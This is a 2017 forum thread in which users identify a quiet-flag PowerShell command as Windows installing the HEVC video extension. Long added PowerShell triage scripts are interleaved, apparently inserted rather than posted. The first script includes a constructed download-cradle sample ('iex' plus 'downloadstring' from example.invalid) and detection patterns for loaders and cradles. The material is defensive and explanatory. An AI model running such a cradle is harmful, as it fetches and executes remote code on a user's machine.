Need Help Suspicious command line after Fall Creators Update

Discussion in 'Apps - Questions & Help' started by shmu26, Dec 28, 2017.

  1. shmu26
    Date of initial issues:
    Today
    Steps taken to resolve, but unsuccessful?:
    scan with Kaspersky, HitmanPro
    Operating System:
    Win10 pro x64
    List current issues or symptoms:
    none
    What do you say about this PowerShell command line? Safe, or malicious? It ran on my computer today, a while after updating to Fall Creators.

    "powershell" -noprofile -noninteractive -inputformat none -executionpolicy bypass add-provisionedappxpackage -online -packagepath "c:\windows\temp\installhevcappxpackage\microsoft.hevcvideoextension_8wekyb3d8bbwe.x64.appx" -dependencypackagepath "c:\windows\temp\installhevcappxpackage\microsoft.vclibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.appx" -licensepath "c:\windows\temp\installhevcappxpackage\microsoft.hevcvideoextension_8wekyb3d8bbwe.x64.xml"
     
  2. Opcode
    I believe it has to do with the installation of Windows Metro applications, the general ones such as your Mail application, since "appxpackage" relates to such packages and there's the "add-" linked to the instruction. Either a new application (Metro style) was added to the FCU environment, or a re-installation/update happened for one.

    I don't think you need to worry about any of it; you were installing the Creators Update and it happened afterwards after all. It's natural for Windows to do additional things in the background after a major update, and the Fall Creators Update changed a whole ton of things so it's not out of the ordinary in my opinion.

    You can try to track the execution of the PowerShell back to the responsible culprit process; I'm sure you're fine. On that note, I recommend disabling PowerShell unless you really need it, because a lot of "file-less" attacks, as people call them, tend to like it.

    Edit:
    Get HEVC Video Extension - Microsoft Store

    I believe this is what was installed via the PowerShell command. It's to do with videos/codecs. It allows you to play content in 4K/Ultra HD system-wide across all apps for HEVC content. You'd have to educate me on HEVC because I don't know much about media terms.
     
  3. SHvFl
    HEVC = x265. You might have heard of it, but if not, it's a "new" codec that is trying to become mainstream for video encoding and replace x264.
     
  4. shmu26
    Thanks.
    When I saw all that appxpackage stuff in the command line, it looked to me like typical Microsoft jargon, so I just assumed that VoodooShield was blocking a false positive, and I sent it on to Dan. But he wasn't happy with "powershell" -noprofile -noninteractive -inputformat none -executionpolicy bypass, which he says is typical of malware.

    Anyways, HitmanPro didn't find anything to speak of on my system, so I am not worried. I will sleep tonight.
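Static triage of the command line quoted in post #1, and of the host switches Dan objected to in post #4, as an added example (this is not code from the thread, from VoodooShield, or from Microsoft). Its assumptions: the publisher-ID suffixes it treats as Microsoft's, the regex heuristics it uses for hostile indicators, a constructed second command line pointing at example.invalid, and that the .appx files may already have been cleaned out of c:\windows\temp by the time you look. The signature check only runs on a Windows host where the files still exist.

```powershell
# Added example, not code from the thread or from VoodooShield: static triage of a
# powershell.exe command line. The heuristics and the publisher-ID list are assumptions
# of this example; the second sample command line below is constructed.

# Publisher-ID suffixes that Microsoft's own Store and inbox packages carry (assumption).
$MicrosoftPublisherIds = @('8wekyb3d8bbwe', 'cw5n1h2txyewy')

function Test-PowerShellCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    $cl = $CommandLine.ToLowerInvariant()

    # Quiet-run host switches: installers and malware both use them, so they are context, not a verdict.
    $quiet = @('-noprofile', '-noninteractive', '-inputformat none', '-executionpolicy bypass',
               '-windowstyle hidden', '-nologo') | Where-Object { $cl.Contains($_) }

    # Payload indicators a servicing task never needs: base64 payloads, download cradles,
    # in-memory loaders, scripts or binaries in user-writable locations.
    $hostilePatterns = [ordered]@{
        'encoded command'    = '\s-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{40,}'
        'download cradle'    = 'downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer'
        'in-memory loader'   = '\biex\b|invoke-expression|frombase64string|reflection\.assembly|virtualalloc'
        'user-writable path' = '\\users\\[^\\]+\\|\\programdata\\|\\appdata\\'
    }
    $hostile = @($hostilePatterns.Keys | Where-Object { $cl -match $hostilePatterns[$_] })

    # First cmdlet (Verb-Noun) after the host switches, e.g. add-provisionedappxpackage.
    $cmdlet = if ($cl -match '(?<![\w-])([a-z]+-[a-z]+)(?![\w-])') { $Matches[1] } else { $null }

    # Package identity from each .appx/.msix file name: Name[_Version][_Arch]_PublisherId.
    $pkgRegex = '([a-z0-9.\-]+)(?:_([0-9.]+))?(?:_[a-z0-9]+)?_+([a-z0-9]{13})(?:\.[a-z0-9]+)*\.(?:appx|msix)(?:bundle)?'
    $packages = @(foreach ($m in [regex]::Matches($cl, $pkgRegex)) {
        [pscustomobject]@{
            Name        = $m.Groups[1].Value
            Version     = $m.Groups[2].Value
            PublisherId = $m.Groups[3].Value
            MicrosoftId = $MicrosoftPublisherIds -contains $m.Groups[3].Value
        }
    })

    # If the packages are still on disk (servicing temp folders are usually cleaned up), check
    # their Authenticode signature; .appx/.msix files carry one and Get-AuthenticodeSignature reads it.
    $paths = @([regex]::Matches($CommandLine, '(?i)-(?:package|dependencypackage)path\s+"?([^"\s]+)') |
              ForEach-Object { $_.Groups[1].Value })
    $signatures = @(foreach ($p in $paths) {
        if ((Test-Path -LiteralPath $p) -and (Get-Command Get-AuthenticodeSignature -ErrorAction SilentlyContinue)) {
            $s = Get-AuthenticodeSignature -LiteralPath $p
            [pscustomobject]@{ Path = $p; Status = $s.Status; Signer = $s.SignerCertificate.Subject }
        } else {
            [pscustomobject]@{ Path = $p; Status = 'not checked (file absent or not on Windows)'; Signer = $null }
        }
    })

    $verdict = if ($hostile.Count -gt 0) {
        'INVESTIGATE: payload indicators that Windows servicing never needs'
    } elseif ($cmdlet -match '^add-(provisioned)?appxpackage$' -and $packages.Count -gt 0 -and
              -not ($packages | Where-Object { -not $_.MicrosoftId })) {
        'Consistent with Windows/Store package servicing; confirm parent process and package signature'
    } else {
        'UNKNOWN: quiet flags alone prove nothing; check the parent process and the script'
    }

    [pscustomobject]@{
        Cmdlet = $cmdlet; QuietFlags = @($quiet); Hostile = $hostile
        Packages = $packages; Signatures = $signatures; Verdict = $verdict
    }
}

# Sample 1: the command line from post #1. Sample 2: a constructed download cradle with the same quiet flags.
$posted = '"powershell" -noprofile -noninteractive -inputformat none -executionpolicy bypass add-provisionedappxpackage -online -packagepath "c:\windows\temp\installhevcappxpackage\microsoft.hevcvideoextension_8wekyb3d8bbwe.x64.appx" -dependencypackagepath "c:\windows\temp\installhevcappxpackage\microsoft.vclibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.appx" -licensepath "c:\windows\temp\installhevcappxpackage\microsoft.hevcvideoextension_8wekyb3d8bbwe.x64.xml"'
$constructed = 'powershell -noprofile -noninteractive -executionpolicy bypass -windowstyle hidden -c "iex (new-object net.webclient).downloadstring(''http://example.invalid/a.ps1'')"'
Test-PowerShellCommandLine $posted      | Format-List
Test-PowerShellCommandLine $constructed | Format-List
```

Both samples light up the same QuietFlags, which is the point: -noprofile, -noninteractive and -executionpolicy bypass are what any unattended script uses, so they cannot separate the two. What separates them is everything after the switches: a provisioning cmdlet with signed Microsoft packages and a Store licence file on one side, an in-memory loader fed by a download cradle on the other. A Microsoft-looking file name is not proof on its own (anyone can name a file that way), which is why the verdict for the posted line still says to confirm the package signature and the parent process.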
     
  5. SHvFl
    Yeah, it has to be the default HEVC app Windows 10 installs even on a clean install. I don't have the logs to go check for it, but I know for sure it installed the app for me.
     
  6. DeepWeb
  7. shmu26
  8. shmu26
    But it is interesting that Microsoft used a PowerShell script to deliver an install. That's unusual, is it not?
     
  9. SHvFl
    Most of the Store crap is delivered and uninstalled that way. I guess it's in order to give administrators more control, or it's just simpler for them :p
     
  10. boredog
    I don't remember seeing that block in VoodooShield or AppGuard, and I do have PowerShell blocked in AppGuard.
     
  11. shmu26
    So if a user totally disables PowerShell, he won't get those Store installs/uninstalls. That could be either bad or good, depending on one's opinion of stuff from the Microsoft Store.
    Actually, installation requires a high level of privileges, so even restricting PowerShell (like with AppGuard "guarded apps") would interfere. Correct?
     
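Opcode's suggestion in post #2 was to trace the PowerShell launch back to the process that started it, and post #11 asks what privilege level the install ran with. Both answers live in the same place, Security event 4688, so here is one added example (not code from the thread, from AppGuard or from VoodooShield) that pulls them out. It assumes "Audit Process Creation" and "Include command line in process creation events" were already enabled when the launch happened (otherwise CommandLine is empty and nothing matches), that the log has not rolled over, and Windows PowerShell 5.1 or later on Windows 10 or newer (older builds do not log the parent process name). The -EvtxPath parameter and its sample path are this example's own, for an exported log.

```powershell
# Added example, not code from the thread: attribute a powershell.exe launch to its parent
# process and token elevation using Security event 4688. Needs process-creation auditing
# with command-line logging enabled beforehand; reading the live Security log needs admin.

function Get-PowerShellLaunchContext {
    param(
        [string]$Pattern = 'add-provisionedappxpackage',   # regex matched against the logged command line
        [string]$EvtxPath,                                  # exported Security.evtx; omit to read the live log
        [int]$MaxEvents = 20000
    )
    $filter = @{ Id = 4688 }
    if ($EvtxPath) { $filter.Path = $EvtxPath } else { $filter.LogName = 'Security' }

    # TokenElevationType is logged as a resource-string ID, not as text.
    $elevation = @{
        '%%1936' = 'Full token (no UAC split: SYSTEM, a service, or UAC disabled)'
        '%%1937' = 'Elevated (admin half of a UAC split token)'
        '%%1938' = 'Limited (standard-user half of a UAC split token)'
    }

    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        if ($d.NewProcessName -notmatch '\\(powershell|pwsh)\.exe$') { return }   # 'return' = continue here
        if ($d.CommandLine    -notmatch $Pattern)                     { return }

        [pscustomobject]@{
            Time        = $_.TimeCreated
            Subject     = "$($d.SubjectDomainName)\$($d.SubjectUserName)"   # account that created the process
            Target      = "$($d.TargetDomainName)\$($d.TargetUserName)"     # account the new process runs as
            Elevation   = $elevation[$d.TokenElevationType]
            Parent      = $d.ParentProcessName                              # Windows 10+ only
            Process     = $d.NewProcessName
            CommandLine = $d.CommandLine
        }
    }
}

# Usage (live log, run elevated):   Get-PowerShellLaunchContext | Format-List
# Usage (exported log, any host):   Get-PowerShellLaunchContext -EvtxPath 'C:\cases\Security.evtx' -Pattern 'appxpackage'
```

Read the result against what the command line claims to be. A Windows servicing action that provisions a package for all users has to run with a full or elevated token, so you would expect Subject/Target to be SYSTEM or an administrator and Parent to be a Microsoft binary under C:\Windows. The same quiet host switches launched by winword.exe, a browser, wscript.exe or explorer.exe with a limited token is the case where "typical of malware" is the right reading, and the parent is where the investigation continues. If the query returns nothing at all, the usual reason is that command-line auditing was off at the time, which is worth fixing before the next event rather than after.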
  12. boredog
    This is how I was told to disable PowerShell in AppGuard:
    [attached screenshots: ScreenHunter_85 Dec. 28 14.48.jpg, ScreenHunter_86 Dec. 28 14.48.jpg]
     
  13. shmu26
    Interesting. Why do you have to also untick it in guarded apps? PowerShell is unsigned, so even if it is a guarded app, it should not run once you add it to user space. That is my understanding of it.
     
  14. Opcode
    Well, Microsoft owns Windows, and thus their own components are active (their kernel for the OS, their components either elevated or not, etc.). Therefore, if Microsoft wants, they can push out an update at any time which will temporarily enable PowerShell for them to execute PowerShell scripts, and then re-disable it.

    Then again, I am sure they have a non-PowerShell variant of what they needed to do somewhere, and if not I doubt it'd be tricky for them to make one in a short time span for people who have it disabled.
     
  15. boredog
    I wondered the very same thing until Lockdown advised me as to why. It was in an old thread over at Wilders; I think it was called the unofficial AppGuard thread.
     
  16. SHvFl
    In theory I assume it will just not update them ever. I have a feeling the basic applications are installed even before you get into Windows.
     